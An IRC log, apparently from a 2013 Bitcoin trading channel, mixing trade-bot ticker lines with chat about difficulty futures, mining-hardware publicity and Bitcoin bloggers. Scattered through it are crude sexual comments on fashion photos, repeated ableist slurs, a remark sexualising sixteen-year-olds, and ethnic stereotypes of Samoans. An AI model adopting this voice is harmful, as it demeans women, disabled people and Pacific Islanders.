0.003367 = 0.0539 BTC [+] Sep 06 17:37:26 [BTCTC] [DMS.PURCHASE] 1 @ 0.01215 BTC [+] Sep 06 17:37:46 jurov you see the new diff thing? Sep 06 17:38:00 https://bitcointalk.org/index.php?topic=288765.msg1521109;topicseen#new Sep 06 17:38:06 [BTC-TC] ET.DIFF: Future to speculate on next difficulty change Sep 06 17:38:13 [BTCTC] [COGNITIVE] 1 @ 0.285 BTC [-] Sep 06 17:38:42 i was working on something akin to it, but never had time to flesh it out Sep 06 17:39:17 oh, not yet Sep 06 17:39:18 jurov actually x.idiff.jun settled at 19`339`258. so Sep 06 17:39:26 ;;calc 0.19339258*2.9 Sep 06 17:39:26 0.560838482 Sep 06 17:39:29 56 and change. Sep 06 17:39:50 so idiff.sep should have already expired Sep 06 17:40:02 ThickAsThieves rehash of the deprived/brendio dual thing ? Sep 06 17:40:07 yep Sep 06 17:40:10 jurov how you figure ? Sep 06 17:40:32 it's much less than current diff 86mil Sep 06 17:40:37 "I like the idea, much more appealing than the other difficulty futures out there!" Sep 06 17:40:39 o 100 mil Sep 06 17:40:46 sooo, who wants to buy fury chips Sep 06 17:40:48 i wonder which he;s talkin;' aboot lol Sep 06 17:41:03 jurov so it is. it still settles on its settlement date. Sep 06 17:41:10 ;; .d Sep 06 17:41:11 Error: ".d" is not a valid command. Sep 06 17:41:17 .d Sep 06 17:41:17 86933017.77119 | Next Diff in 1598 blocks | Estimated Change: 19.8412% in 8d 21h 12m 21s Sep 06 17:41:35 Consequently, in the event of a net seller's deposited collateral being exceded by current difficulty a proportional number of open contracts will be forcibly liquidated. Sep 06 17:41:54 ^if this is being done on expiry date anyway why this extra clause? Sep 06 17:42:04 also kinda bad to have it up for sale as an obvious loss Sep 06 17:42:32 ThickAsThieves that is true. Sep 06 17:42:39 yeah lets mess with more complicated things Sep 06 17:43:13 [HAVELOCK] [AM1] 2 @ 2 = 4 BTC [+] Sep 06 17:43:15 jurov just in case i guess. Sep 06 17:43:46 anyway, im not quite sure the eltopo guy quite understands what he's doing. looks to me more like some guy had an idea and ran off to implement it. Sep 06 17:44:06 i havent read the full details bit by bit yet Sep 06 17:44:14 why are these clows still around https://bitcointalk.org/index.php?topic=5441.msg3094685#msg3094685 Sep 06 17:44:18 clowns Sep 06 17:44:19 i was presuming he had his ducks in rows Sep 06 17:44:30 haven't you learned anything yet ? Sep 06 17:44:35 presume the exact opposite. Sep 06 17:44:53 well i dont need to lean on the presumption Sep 06 17:45:00 thats why i read it before i buy it Sep 06 17:45:01 kakobrekla lol. you were right about those in the end ? Sep 06 17:45:38 its sad when im right. Sep 06 17:45:40 [BTCTC] [ACTIVEMINING] 1 @ 0.0042 BTC [+] Sep 06 17:45:42 [BTCTC] [ACTIVEMINING] 30 @ 0.004113 = 0.1234 BTC [-] Sep 06 17:45:43 [BTCTC] [ACTIVEMINING] 3 @ 0.004112 = 0.0123 BTC [-] Sep 06 17:45:44 [BTCTC] [ACTIVEMINING] 110 @ 0.004111 = 0.4522 BTC [-] Sep 06 17:45:45 [BTCTC] [ACTIVEMINING] 200 @ 0.004108 = 0.8216 BTC [-] Sep 06 17:45:47 [BTCTC] [ACTIVEMINING] 150 @ 0.004012 = 0.6018 BTC [-] Sep 06 17:45:48 [BTCTC] [ACTIVEMINING] 50 @ 0.004009 = 0.2005 BTC [-] Sep 06 17:45:48 [BTCTC] [ACTIVEMINING] 2734 @ 0.004008 = 10.9579 BTC [-] Sep 06 17:45:57 Bitalo will be at the Amsterdam thing Sep 06 17:46:19 which I am still entertaining attending Sep 06 17:46:21 Scamsterdam. Sep 06 17:46:34 ThickAsThieves you showing up in april btw ? Sep 06 17:46:43 i wont know for a while Sep 06 17:46:47 i wrote to the guy organising it to let him know he is harboring 3 or more known scammers Sep 06 17:46:49 family stuff Sep 06 17:47:06 kakobrekla did he answer ? Sep 06 17:47:39 well first main was just saying if he is nuts, then he asked who are those scammers and i wrote to him (who and why and when). no response. Sep 06 17:47:44 main = mail Sep 06 17:47:57 http://omulfarachip.files.wordpress.com/2012/08/1-b9e8b992.jpg << fashion, finally! Sep 06 17:48:29 someone dropped 1982 on her head Sep 06 17:49:09 lol Sep 06 17:49:11 love to colors. Sep 06 17:49:28 yeah i was thinking, these new designers are so fucking dumb they can't even match the hat and shoes when there's nothing else there. Sep 06 17:49:31 her boobs are square. Sep 06 17:49:42 kakobrekla http://omulfarachip.files.wordpress.com/2012/08/1-0fb1d708.jpg there, spherical. Sep 06 17:49:44 she is a cylon Sep 06 17:49:45 too much TV Sep 06 17:49:54 beta boobs Sep 06 17:50:09 just like my external no-heating pillow. Sep 06 17:50:27 by now i'm wondering if most of these people have actually even seen a naked woman. Sep 06 17:50:56 i mean, they all pretend to be gay, they're extremely awkward socially inept individuals and there's so much plastic surgery hackness going around... Sep 06 17:51:02 they might have never seen a naked girl. Sep 06 17:51:40 most of which people? Sep 06 17:51:57 fashion "designers". Sep 06 17:52:19 ah Sep 06 17:52:21 http://omulfarachip.files.wordpress.com/2012/08/mo10.jpg yeesh Sep 06 17:52:45 whats this for Sep 06 17:52:49 somebody got a little carried away with the lipstick ? Sep 06 17:53:06 certanly not for fucking Sep 06 17:53:09 [BTCTC] [DMS.MINING] 1 @ 0.002388 BTC [-] Sep 06 17:53:26 [BTCTC] [LABCOIN] 3 @ 0.00332 = 0.01 BTC [-] Sep 06 17:53:27 [BTCTC] [LABCOIN] 3 @ 0.003321 = 0.01 BTC [+] Sep 06 17:53:28 [BTCTC] [LABCOIN] 200 @ 0.003348 = 0.6696 BTC [+] Sep 06 17:53:30 [BTCTC] [LABCOIN] 478 @ 0.003349 = 1.6008 BTC [+] Sep 06 17:53:31 [BTCTC] [LABCOIN] 1 @ 0.003369 BTC [+] Sep 06 17:53:32 [BTCTC] [LABCOIN] 1 @ 0.00337 BTC [+] Sep 06 17:53:33 mircea_popescu: you tellin me to stop being retarded? Sep 06 17:53:33 [BTCTC] [LABCOIN] 278 @ 0.003379 = 0.9394 BTC [+] Sep 06 17:53:34 [BTCTC] [LABCOIN] 36 @ 0.003384 = 0.1218 BTC [+] Sep 06 17:53:41 [BTCTC] [DMS.MINING] 9 @ 0.002389 = 0.0215 BTC [+] Sep 06 17:53:46 you don't like snufflupagus? Sep 06 17:54:01 http://omulfarachip.files.wordpress.com/2012/08/1-1ed592ba.jpg wow look. same shoes ?! Sep 06 17:54:16 [BTCTC] [DMS.MINING] 2 @ 0.002389 = 0.0048 BTC [+] Sep 06 17:54:17 thestringpuller some random webchat spammor. Sep 06 17:54:20 oh Sep 06 17:54:46 !last m s.mpoe Sep 06 17:54:47 Last trade for S.MPOE on MPEX was at 0.00088133 BTC [-] Sep 06 17:54:52 !ticker m ^OIX Sep 06 17:54:54 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / 195.15803475 / 195.15803475 (4 shares, 1.65 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Sep 06 17:55:09 hm Sep 06 17:55:13 thats odd Sep 06 17:55:27 !ticker m s.mpoe Sep 06 17:55:27 is assbot being strange? Sep 06 17:55:28 [BTCTC] [ACTIVEMINING] 300 @ 0.004049 = 1.2147 BTC [+] Sep 06 17:55:29 [BTCTC] [ACTIVEMINING] 300 @ 0.00405 = 1.215 BTC [+] Sep 06 17:55:30 [MPEX:S.MPOE] 1D: 0.00081 / 0.00087908 / 0.00090058 (435261 shares, 382.63 BTC), 7D: 0.00081 / 0.00086931 / 0.00090058 (2111710 shares, 1,835.74 BTC), 30D: 0.00081 / 0.00085261 / 0.00090058 (7881959 shares, 6,720.26 BTC) Sep 06 17:55:30 [BTCTC] [ACTIVEMINING] 475 @ 0.00408 = 1.938 BTC [+] Sep 06 17:55:31 [BTCTC] [ACTIVEMINING] 125 @ 0.004084 = 0.5105 BTC [+] Sep 06 17:55:37 people are strange Sep 06 17:55:49 http://thegenesisblock.com/easic-announces-24-ths-hash-fast-miner-activemining-shares-move-70/ Sep 06 17:55:51 eASIC Announces 24 TH/s Fast-Hash Miner, ActiveMining Shares Move 70% - The Genesis Block Sep 06 17:56:13 [BTCTC] [ACTIVEMINING] 10 @ 0.004092 = 0.0409 BTC [+] Sep 06 17:56:14 [BTCTC] [ACTIVEMINING] 10 @ 0.004093 = 0.0409 BTC [+] Sep 06 17:56:34 http://cdn04.cdnwp.thefrisky.com/wp-content/uploads/2013/02/25/seinfeld.gif Sep 06 17:56:59 title forgets to mention that the shares moved back to norm almost immediately.. Sep 06 17:57:16 [HAVELOCK] [XBOND] 1 @ 0.00109996 BTC [+] Sep 06 17:57:22 Pfff. Who cares about share price. Sep 06 17:57:45 It's those shopped images... so glorious. Sep 06 17:57:53 http://thegenesisblock.com/wp-content/uploads/2013/09/55-thickbox_default.jpg?a3bf7d Sep 06 17:57:59 LOL Sep 06 17:58:10 "All Specification Subject To Changes Without Notice" lol Sep 06 17:58:18 so we preorder something and it can change? Sep 06 17:59:02 At some point the transaction must be locked in. Sep 06 17:59:11 http://omulfarachip.files.wordpress.com/2012/08/mn21.jpg Sep 06 17:59:20 omg, her farts must smell bad Sep 06 17:59:29 [BTCTC] [LABCOIN] 1 @ 0.003274 BTC [-] Sep 06 17:59:31 [BTCTC] [LABCOIN] 5 @ 0.003273 = 0.0164 BTC [-] Sep 06 17:59:32 [BTCTC] [LABCOIN] 5 @ 0.003271 = 0.0164 BTC [-] Sep 06 17:59:32 [BTCTC] [LABCOIN] 21 @ 0.00327 = 0.0687 BTC [-] Sep 06 17:59:34 [BTCTC] [LABCOIN] 445 @ 0.003264 = 1.4525 BTC [-] Sep 06 17:59:35 [BTCTC] [LABCOIN] 106 @ 0.003262 = 0.3458 BTC [-] Sep 06 17:59:36 [BTCTC] [LABCOIN] 100 @ 0.00326 = 0.326 BTC [-] Sep 06 17:59:37 [BTCTC] [LABCOIN] 50 @ 0.003252 = 0.1626 BTC [-] Sep 06 17:59:38 [BTCTC] [LABCOIN] 200 @ 0.003251 = 0.6502 BTC [-] Sep 06 17:59:39 [BTCTC] [LABCOIN] 25 @ 0.003219 = 0.0805 BTC [-] Sep 06 17:59:40 [BTCTC] [LABCOIN] 100 @ 0.003218 = 0.3218 BTC [-] Sep 06 17:59:41 [BTCTC] [LABCOIN] 199 @ 0.003213 = 0.6394 BTC [-] Sep 06 17:59:42 would bang, if she didn't have the vegan tattoo Sep 06 17:59:42 http://cdn04.cdnwp.thefrisky.com/wp-content/uploads/2013/02/25/seinfeld.gif << this Sep 06 17:59:43 [BTCTC] [LABCOIN] 700 @ 0.003212 = 2.2484 BTC [-] Sep 06 17:59:44 [BTCTC] [LABCOIN] 99 @ 0.00321 = 0.3178 BTC [-] Sep 06 17:59:44 [BTCTC] [LABCOIN] 2122 @ 0.003201 = 6.7925 BTC [-] Sep 06 17:59:45 [BTCTC] [LABCOIN] 4407 @ 0.0032 = 14.1024 BTC [-] Sep 06 18:01:20 kleeck you know, there's an entire subculture on the webs that really doesn't make the distinction between "real product" and "photoshopped image". Sep 06 18:01:31 they gather around the warrior forum etc, they make "informational products", Sep 06 18:01:43 why would the blog even use that Sep 06 18:01:51 each "offering" must include a picture of a book that doesn't exist, shaded just so, reflected off the table just so etc. Sep 06 18:01:52 if i was editor i'd be like get the fuck outta hea Sep 06 18:02:01 same ^ Sep 06 18:02:41 [BTCTC] [ACTIVEMINING] 12 @ 0.004102 = 0.0492 BTC [+] Sep 06 18:02:57 "bitocin mining" Sep 06 18:03:06 I wonder who wrote it and who paid for it :p Sep 06 18:03:25 right. the only certainty is that it was under a buttcoin. Sep 06 18:05:04 Actually. I shot an email to Jeff over at TGB telling him to add the VMC miner to his mining dashboard and he responded very quickly. Sep 06 18:05:22 Thanks for reaching out Kleeck. I am planning on adding these tonight. The large number of product options adds some complexity that needs to be addressed. Sep 06 18:05:23 Cheers, Sep 06 18:05:23 Jeff Sep 06 18:05:42 ask him to take down shopped hardware shots too Sep 06 18:06:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.01998 BTC [+] Sep 06 18:06:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.01999 = 0.1999 BTC [+] Sep 06 18:06:14 [BTCTC] [TAT.ASICMINER] 39 @ 0.02 = 0.78 BTC [+] Sep 06 18:06:15 You ask him. I don't give a shit. Sep 06 18:06:26 It just looks horrible. Sep 06 18:06:41 [BTCTC] [LABCOIN] 3 @ 0.003302 = 0.0099 BTC [+] Sep 06 18:06:42 [BTCTC] [LABCOIN] 3 @ 0.003303 = 0.0099 BTC [+] Sep 06 18:06:44 [BTCTC] [LABCOIN] 5 @ 0.003343 = 0.0167 BTC [+] Sep 06 18:06:45 [BTCTC] [LABCOIN] 5 @ 0.003344 = 0.0167 BTC [+] Sep 06 18:06:46 [BTCTC] [LABCOIN] 4 @ 0.003346 = 0.0134 BTC [+] Sep 06 18:06:46 [BTCTC] [LABCOIN] 8 @ 0.003346 = 0.0268 BTC [+] Sep 06 18:06:47 [BTCTC] [LABCOIN] 8 @ 0.003347 = 0.0268 BTC [+] Sep 06 18:06:48 alrighty then Sep 06 18:06:48 [BTCTC] [LABCOIN] 315 @ 0.003361 = 1.0587 BTC [+] Sep 06 18:06:49 [BTCTC] [LABCOIN] 315 @ 0.003363 = 1.0593 BTC [+] Sep 06 18:06:50 [BTCTC] [LABCOIN] 4000 @ 0.003384 = 13.536 BTC [+] Sep 06 18:06:51 [BTCTC] [LABCOIN] 3000 @ 0.003385 = 10.155 BTC [+] Sep 06 18:06:52 [BTCTC] [LABCOIN] 334 @ 0.003387 = 1.1313 BTC [+] Sep 06 18:07:15 ThickAsThieves let the guy make up and follow his own editorial policy, after which he may get all indignant that the girl's pissing all over his face and wonder why is mpex so mean. Sep 06 18:07:26 and perhaps whine about how it is all very bad "for business" Sep 06 18:07:51 everyone needs a little push sometimes Sep 06 18:08:22 i guess. Sep 06 18:08:28 [BTCTC] [LABCOIN] 271 @ 0.003384 = 0.9171 BTC [-] Sep 06 18:08:30 [BTCTC] [LABCOIN] 4 @ 0.003386 = 0.0135 BTC [+] Sep 06 18:08:44 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [-] Sep 06 18:08:47 [BTCTC] [DMS.SELLING] 1 @ 0.009948 BTC [-] Sep 06 18:09:01 [BTCTC] [ACTIVEMINING] 30 @ 0.0041 = 0.123 BTC [-] Sep 06 18:09:02 thegenesisblock is way past that point as best i can determine. Sep 06 18:09:02 [BTCTC] [ACTIVEMINING] 10 @ 0.004101 = 0.041 BTC [+] Sep 06 18:09:03 [BTCTC] [ACTIVEMINING] 20 @ 0.004101 = 0.082 BTC [+] Sep 06 18:09:04 [BTCTC] [ACTIVEMINING] 40 @ 0.004104 = 0.1642 BTC [+] Sep 06 18:09:21 [BTCTC] [ASICMINER-PT] 1 @ 2.046 BTC [-] Sep 06 18:09:24 [BTCTC] [ASICMINER-PT] 2 @ 2.046 = 4.092 BTC [-] Sep 06 18:09:37 we need some real serious bloggers, there's no point in trying to fix these broken ones. Sep 06 18:10:02 TGB is a cut above most Sep 06 18:10:05 they're broken for a reason, not for lack of opportunity. they're broken people outright, and that ain't fixable. Sep 06 18:10:27 ThickAsThieves i don't recall one good story. do you ? Sep 06 18:11:18 i wouldnt call much of it stories Sep 06 18:11:26 so much as aggregation of news Sep 06 18:11:35 ok, so cut above in what sense ? Sep 06 18:11:46 mostly true Sep 06 18:12:19 and better design :) Sep 06 18:12:25 but he'll publish anything whatsoever. you know he will. if i pay to have VanCleef's amethyst up there he will do it. Sep 06 18:12:47 would be an interesting test Sep 06 18:12:55 how troll-proof is bitcoin media Sep 06 18:13:04 heh. Sep 06 18:13:30 see, now THIS would be a story. Sep 06 18:13:34 might get them to wake up a lil too Sep 06 18:13:40 great way for an actual, serious blogger to start his blog, for that matter. Sep 06 18:13:49 indeed Sep 06 18:13:54 that's the fucking problem, we have all these retards. Sep 06 18:14:26 if we could trade 100 "community members" for one intelligent, educated and capable guy it'd be a grand deal. Sep 06 18:15:02 i'd take it about five hundred times. greatest currency in the world we don't have a fucking blogger. where's our drudge already. Sep 06 18:15:02 all those people are busy making better money elsewhere i guess Sep 06 18:15:11 it's a matter of calling not of money. Sep 06 18:15:22 i thought it was you Sep 06 18:15:25 ;) Sep 06 18:15:27 LOL Sep 06 18:15:34 if people only did what pays there would never be any hot sixteen year olds because it doesn't pay to have babies. Sep 06 18:15:43 [MPEX] [S.MPOE] 16400 @ 0.00088197 = 14.4643 BTC [+] Sep 06 18:15:56 mircea_popescu is our Alex Jones. Sep 06 18:16:03 hardly. Sep 06 18:16:08 if i am i do a horribly sucky job of it. Sep 06 18:16:09 Absolutely. Sep 06 18:16:16 mp is our mp Sep 06 18:16:21 but would smart people bother with bitcoin, when you can be a daytrader and making like 10g's off a few ticks? Sep 06 18:16:23 You are absolutely the Bitcoin Alex Jones. Sep 06 18:16:25 why Sep 06 18:16:35 back in real world markets Sep 06 18:16:37 VanCleef because bitcoin is cool. fiat is not. Sep 06 18:16:55 most people that are competent don't work to fend off hunger and keep the lights on. Sep 06 18:16:58 but the marketsplace is so fucking retarded that simple logical stuff, doesn't work Sep 06 18:17:10 they work because they like what they do. i'm not here because of whatever much dought. Sep 06 18:17:25 i guess it sounds hypocritical seeing how i made tons over the past coupla years, but hey. tis true. Sep 06 18:17:47 fiat is still cool :) Sep 06 18:17:56 Fiat is lame, braaaah. Sep 06 18:17:58 VanCleef who cares about the marketplace ? i'd read it. what do you want the applause of the mob for ? cicero knew better. you want the applause of the people you respek. Sep 06 18:18:25 i dont want any respect Sep 06 18:19:00 We all want some respect, man. Just a little bit. Just a little bit. Sep 06 18:19:31 true, i dont have that problem hey Sep 06 18:19:41 as long as my bank account is full, who needs respect Sep 06 18:19:43 respect is a pretty valuable asset Sep 06 18:19:51 VanCleef how long has your bank account been full ? Sep 06 18:20:04 last 2 years Sep 06 18:20:15 ya well give yourself some time. Sep 06 18:20:19 it fills? Sep 06 18:20:37 but anyway you cant expect too many smart people involved in bitcoin when this is a stockmarket brokers game Sep 06 18:20:37 ThickAsThieves yeah my bank calls me up all the time, "mr popescu your current account is full. shall we open another ?" Sep 06 18:20:55 lol Sep 06 18:21:03 irllol Sep 06 18:21:10 VanCleef 1. there are a bunch and 2. the problem is just that a bunch of internet retards are being very vocal about how bitcoin is them. Sep 06 18:21:25 it isn't, but they're the main fucking threat. Sep 06 18:21:28 yeah Sep 06 18:21:44 and then american bitcoin companies being the CEO again Sep 06 18:22:01 usg can never close down bitcoin, but usg can actually pay fiddy cents to fiddy thousand american retards to make it look so stupid nobody will want to get involved. Sep 06 18:22:06 all it cost is like... half a miner. Sep 06 18:22:13 heh Sep 06 18:22:16 true Sep 06 18:22:37 did you use to be a trader back in real world markets before coming across bitcoin? Sep 06 18:22:44 and usg can also make it difficult for any worthy americans to be legit in bitcoin business Sep 06 18:22:48 i suspect very much so Sep 06 18:22:54 after all, the tyranny didn't start there by turning off elections, like they do in south america. Sep 06 18:23:09 in north america they just fill the rolls with retards. much more effectual and certainly cheaper Sep 06 18:23:15 as there's never a shortage of retards. Sep 06 18:23:26 pssst Sep 06 18:23:31 ThickAsThieves and they are. which is why im even saying, if it's a plan then it's a good plan. Sep 06 18:23:42 [BTCTC] [ACTIVEMINING] 10 @ 0.004002 = 0.04 BTC [-] Sep 06 18:23:43 [BTCTC] [ACTIVEMINING] 1 @ 0.004001 BTC [-] Sep 06 18:23:45 [BTCTC] [ACTIVEMINING] 250 @ 0.00398 = 0.995 BTC [-] Sep 06 18:23:46 [BTCTC] [ACTIVEMINING] 38 @ 0.003943 = 0.1498 BTC [-] Sep 06 18:23:47 [BTCTC] [ACTIVEMINING] 154 @ 0.003927 = 0.6048 BTC [-] Sep 06 18:23:48 [BTCTC] [ACTIVEMINING] 6 @ 0.003926 = 0.0236 BTC [-] Sep 06 18:23:49 [BTCTC] [ACTIVEMINING] 22 @ 0.003925 = 0.0864 BTC [-] Sep 06 18:23:51 [BTCTC] [ACTIVEMINING] 4 @ 0.003924 = 0.0157 BTC [-] Sep 06 18:23:52 [BTCTC] [ACTIVEMINING] 10 @ 0.003921 = 0.0392 BTC [-] Sep 06 18:23:52 [BTCTC] [ACTIVEMINING] 40 @ 0.00392 = 0.1568 BTC [-] Sep 06 18:23:53 [BTCTC] [ACTIVEMINING] 20 @ 0.003906 = 0.0781 BTC [-] Sep 06 18:23:54 [BTCTC] [ACTIVEMINING] 1810 @ 0.003905 = 7.0681 BTC [-] Sep 06 18:23:57 ThickAsThieves - the usb makes it difficult for worthy americans to be legit in any business. Sep 06 18:24:00 and people are lazy. they know i'm right when i tell them to just leave that place, but... leave ? to go where ? etc. Sep 06 18:24:09 bloctoc luckily for us. Sep 06 18:24:15 china Sep 06 18:24:20 [BTCTC] [ASICMINER-PT] 1 @ 2.048 BTC [+] Sep 06 18:24:33 [BTCTC] [ASICMINER-PT] 1 @ 2.087 BTC [+] Sep 06 18:24:38 my usual answer is "go someplace you always waned to visit" Sep 06 18:24:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.02 BTC [+] Sep 06 18:24:47 you'll need to count on young bucks like mjr Sep 06 18:24:47 tibet or dubai or w/e. vietnam Sep 06 18:24:50 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [+] Sep 06 18:25:00 oh btw oh bummer when Lord Putin invites you to dinner, you rock up 10 mins early Sep 06 18:25:15 [HAVELOCK] [XBOND] 2 @ 0.00109996 = 0.0022 BTC [+] Sep 06 18:25:18 ThickAsThieves this will be unpleasant to hear, but as far as i can tell if your fambly won't follow you to the ends of the earth you don't have a fambly. Sep 06 18:25:34 just some people employing you around their house. Sep 06 18:25:45 [BTCTC] [DMS.PURCHASE] 2 @ 0.01215 = 0.0243 BTC [+] Sep 06 18:25:47 well this is not the simplest thing to put to the test Sep 06 18:25:53 fo sho. Sep 06 18:25:57 We must move for bitcoin, for the familia! Sep 06 18:26:14 lol Sep 06 18:26:20 tatto satoshi on your face Sep 06 18:26:50 [BTCTC] [ASICMINER-PT] 1 @ 2.09 BTC [+] Sep 06 18:27:10 [BTCTC] [ASICMINER-PT] 1 @ 2.091 BTC [+] Sep 06 18:27:31 but as an investor isn't it retarded to put 100% of your weight into bitcoin? Sep 06 18:27:42 i doubt anyone managed that yet. Sep 06 18:27:46 i can tell you my wife would let ME move for a period of time to make shit happen, that has already been approved Sep 06 18:28:08 i know what youre gonna say to that... Sep 06 18:28:10 well 100% into anything Sep 06 18:28:13 im not sayin' anything. Sep 06 18:28:16 hehe Sep 06 18:28:19 i'm going back to western samoa Sep 06 18:28:23 there isn't shit there Sep 06 18:28:26 jcpham always suspected you were fat. Sep 06 18:28:32 it's already planned Sep 06 18:28:37 lol Sep 06 18:28:39 [BTCTC] [ASICMINER-PT] 1 @ 2.099 BTC [+] Sep 06 18:28:44 155 lbs of poor heft Sep 06 18:28:49 *pure Sep 06 18:28:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.01954 = 0.0977 BTC [-] Sep 06 18:28:59 so YOU are bitcoin's alex jones Sep 06 18:29:07 http://upload.wikimedia.org/wikipedia/commons/4/41/Alex_Jones_NY.jpg Sep 06 18:29:10 that poor shirt, you know ? Sep 06 18:29:12 i don't know what the fuck i weigh liters or grams sorry Sep 06 18:29:28 looks like chihuaua cunt wrapped around a well endowed labrador. Sep 06 18:29:32 [BTCTC] [ACTIVEMINING] 2 @ 0.003927 = 0.0079 BTC [+] Sep 06 18:29:34 [BTCTC] [ACTIVEMINING] 10 @ 0.003926 = 0.0393 BTC [-] Sep 06 18:29:35 [BTCTC] [ACTIVEMINING] 135 @ 0.003918 = 0.5289 BTC [-] Sep 06 18:29:36 [BTCTC] [ACTIVEMINING] 33 @ 0.003915 = 0.1292 BTC [-] Sep 06 18:29:37 [BTCTC] [ACTIVEMINING] 70 @ 0.003915 = 0.2741 BTC [-] Sep 06 18:29:39 [BTCTC] [ACTIVEMINING] 47 @ 0.003906 = 0.1836 BTC [-] Sep 06 18:29:40 [BTCTC] [ACTIVEMINING] 190 @ 0.003905 = 0.742 BTC [-] Sep 06 18:29:41 [BTCTC] [ACTIVEMINING] 137 @ 0.003901 = 0.5344 BTC [-] Sep 06 18:29:42 [BTCTC] [ACTIVEMINING] 50 @ 0.0039 = 0.195 BTC [-] Sep 06 18:29:42 [BTCTC] [ACTIVEMINING] 317 @ 0.0039 = 1.2363 BTC [-] Sep 06 18:30:03 i've been trying to get land in a certain area of .ws for about 5 years now Sep 06 18:30:08 i know people there Sep 06 18:30:08 17:29.12 ( mircea_popescu ) that poor shirt, you know ? Sep 06 18:30:09 lol Sep 06 18:30:09 whites Sep 06 18:30:14 they own land Sep 06 18:30:18 [BTCTC] [ASICMINER-PT] 2 @ 2.1 = 4.2 BTC [+] Sep 06 18:30:19 [BTCTC] [ASICMINER-PT] 3 @ 2.1 = 6.3 BTC [+] Sep 06 18:30:20 [BTCTC] [ASICMINER-PT] 10 @ 2.1 = 21 BTC [+] Sep 06 18:30:22 [BTCTC] [ASICMINER-PT] 3 @ 2.101 = 6.303 BTC [+] Sep 06 18:30:23 their neighbors are the swiss ambassodrs Sep 06 18:30:23 [BTCTC] [ASICMINER-PT] 2 @ 2.115 = 4.23 BTC [+] Sep 06 18:30:31 not bad. Sep 06 18:30:31 is .ws their tld? Sep 06 18:30:33 we've hung out. it was groovy Sep 06 18:30:34 yea Sep 06 18:30:35 [BTCTC] [ASICMINER-PT] 1 @ 2.115 BTC [+] Sep 06 18:30:36 i like this idea Sep 06 18:30:41 yes Sep 06 18:30:44 referring to countries by their tld Sep 06 18:30:46 .ws is like undeveloped Sep 06 18:30:48 small island Sep 06 18:30:51 close to .nz Sep 06 18:31:06 very nice jolly fat people mostly Sep 06 18:31:08 uneducated Sep 06 18:31:23 and with a serious alcohol problem Sep 06 18:31:31 i imagine i'd do well Sep 06 18:31:38 it's a 10 min drive into the city Sep 06 18:31:40 [BTCTC] [DMS.MINING] 2 @ 0.002389 = 0.0048 BTC [+] Sep 06 18:31:44 and everything else. Sep 06 18:31:44 from wherever you live Sep 06 18:31:47 lol Sep 06 18:32:05 50g's there will set you up like a king Sep 06 18:32:13 i dunno man, i don't have a problem importing my pillows, but i like to use at least half local. Sep 06 18:32:18 those girls don't look beddable. Sep 06 18:32:33 the harem travels with me of course Sep 06 18:32:51 they learn to do without indoor planning Sep 06 18:33:00 and scant elctricity Sep 06 18:33:25 a closed harem is a difficult proposition. tensions build, you'll end up with drama on your hands. Sep 06 18:33:57 http://dailyirabu.files.wordpress.com/2010/08/4903506.jpeg << this is what i think when i hear of samoa btw. Sep 06 18:34:08 [BTCTC] [ASICMINER-PT] 1 @ 2.115 BTC [+] Sep 06 18:34:41 yeah that's pretty close mircea_popescu Sep 06 18:34:42 [HAVELOCK] [DEALCO] 2 @ 0.01285 = 0.0257 BTC [-] Sep 06 18:34:44 [HAVELOCK] [DEALCO] 9 @ 0.012841 = 0.1156 BTC [-] Sep 06 18:34:45 [HAVELOCK] [DEALCO] 10 @ 0.0128305 = 0.1283 BTC [-] Sep 06 18:34:47 [HAVELOCK] [DEALCO] 20 @ 0.01283 = 0.2566 BTC [-] Sep 06 18:34:50 but if you are humble those frowns are upside down Sep 06 18:34:50 [HAVELOCK] [DEALCO] 5 @ 0.01270014 = 0.0635 BTC [-] Sep 06 18:34:52 [HAVELOCK] [DEALCO] 188 @ 0.01270013 = 2.3876 BTC [-] Sep 06 18:35:10 that won't help me then. Sep 06 18:35:18 ahahaha Sep 06 18:35:32 meanwhile in romania http://marlani.ro/wp-content/uploads/2012/07/vvvvvvvvvvv.jpg Sep 06 18:35:57 http://qz.com/121143/toshiba-has-invented-a-quantum-cryptography-network-that-even-the-nsa-cant-hack/ Sep 06 18:36:00 Toshiba has invented a quantum cryptography network that even the NSA can’t hack – Quartz Sep 06 18:36:42 [BTCTC] [ASICMINER-PT] 1 @ 2.119 BTC [+] Sep 06 18:37:40 it's not encryption, is just detection of interception. and afaik it was in the field for military coms for a while. optic fiber allows it. Sep 06 18:37:48 aaanyway. im off to the 100mn diff celebration. take it easy all. Sep 06 18:38:01 peace Sep 06 18:38:05 l8r Sep 06 18:38:29 [HAVELOCK] [AM100] 10 @ 0.02045 = 0.2045 BTC [+] Sep 06 18:39:22 [HAVELOCK] [LABCO] 10 @ 0.00311 = 0.0311 BTC [-] Sep 06 18:39:28 [HAVELOCK] [LABCO] 13 @ 0.0031005 = 0.0403 BTC [-] Sep 06 18:39:37 [HAVELOCK] [LABCO] 110 @ 0.0031 = 0.341 BTC [-] Sep 06 18:39:43 [HAVELOCK] [LABCO] 20 @ 0.003055 = 0.0611 BTC [-] Sep 06 18:39:54 [HAVELOCK] [LABCO] 450 @ 0.003055 = 1.3748 BTC [-] Sep 06 18:40:55 [BTCTC] [DMS.SELLING] 1 @ 0.009948 BTC [-] Sep 06 18:40:55 [BTCTC] [DMS.SELLING] 1 @ 0.009948 BTC [-] Sep 06 18:46:13 [HAVELOCK] [AM1] 1 @ 2.01 BTC [+] Sep 06 18:49:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.0199 = 0.0995 BTC [+] Sep 06 18:51:21 [BTCTC] [ASICMINER-PT] 3 @ 2.12 = 6.36 BTC [+] Sep 06 18:52:49 [BTCTC] [DMS.PURCHASE] 411 @ 0.01215 = 4.9937 BTC [+] Sep 06 18:54:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.0196 = 0.0588 BTC [-] Sep 06 18:54:18 [BTCTC] [TAT.ASICMINER] 28 @ 0.01954 = 0.5471 BTC [-] Sep 06 18:55:21 [BTCTC] [ASICMINER-PT] 1 @ 2.12 BTC [+] Sep 06 18:57:39 [BTCTC] [DMS.PURCHASE] 15 @ 0.0126 = 0.189 BTC [+] Sep 06 